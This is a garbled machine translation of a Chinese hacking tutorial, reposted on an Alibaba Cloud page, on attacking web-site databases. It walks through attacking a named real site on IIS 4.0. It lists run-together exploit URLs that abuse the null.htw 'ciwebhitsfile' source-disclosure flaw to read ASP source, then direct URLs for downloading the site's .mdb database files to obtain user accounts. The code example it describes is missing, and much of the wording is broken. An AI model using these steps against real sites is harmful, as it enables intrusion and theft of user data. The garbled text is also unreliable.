A typical Web server uses a database to store information, and almost every Web site uses a database. There are two possibilities, one of which is to use small databases, such as aceess, that are typically stored locally. Another is to use a large database, such as SQL Server,oracle, which is typically placed on another machine, and then accessed through ODBC. Because the page often needs to query a variety of information, modify user information and other operations, in essence, and database dealings. This gives illegal users a chance to take advantage of them. Attacks on the local database. One way to attack a local database is to download the database, and then you can open the database to get internal users and accounts, and other useful information. The following "Lotus will" as an example: after scanning, learned that Www.suilian.net is using a virtual host, using the Windows nt+iis4.0. Scanners you can use Twwwscan or anything else, but the functionality is similar. If you can see the ASP source code when you attack IIS, the likelihood of success is great. After testing, found that the site has a source code exposure vulnerability ... You can try it: HTTP://WWW.SUILIAN.NET/NULL.HTW? Ciwebhitsfile=/maillist.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/null.htw? Ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/null.htw? Ciwebhitsfile=/chat/detnew.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/null.htw? Ciwebhitsfile=/chat/detail.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/null.htw? Ciwebhitsfile=/chat/topic4.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/null.htw? ciwebhitsfile=/chat/titlefrm.asp%20&cirestriction=none&cihilitetype=fullhttp://www.suilian.net/ Null.htw? What did Ciwebhitsfile=/chat/titlenew.asp%20&cirestriction=none&cihilitetype=full see? Of course, the source code leaks a number of vulnerabilities, here are not listed, you can go to the bug manual. Now you can see the ASP source code. If you are not familiar with ASP, I briefly introduce (in fact, Allison is not familiar with). ASP is embedded between. Typically use VBScript or JavaScript to write code. Look at this example using VBScript: This is a typical code that connects to the database. The steps are: Establish the Connection object, set the database path, open the database, set the Record object, take the record. Here we can know the type, name and path of the database, which is in the current directory. You can also know the table name and field name of the database. Experienced programmers typically do not place database names directly in the code, but instead set up data sources in ODBC to increase security. And then you find that there are databases like D:\s\suilian\chat\news.mdbd:\s\suilian\topic22.mdb you just use http://www.suilian.net/chat/news.mdbhttp:// Www.suilian.net/topic22.mdb can download it ... Responsible Editor Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 to force (0 Votes) Tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) passed (0 Votes) The original text: Talking about the attack of the database back to network security home
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.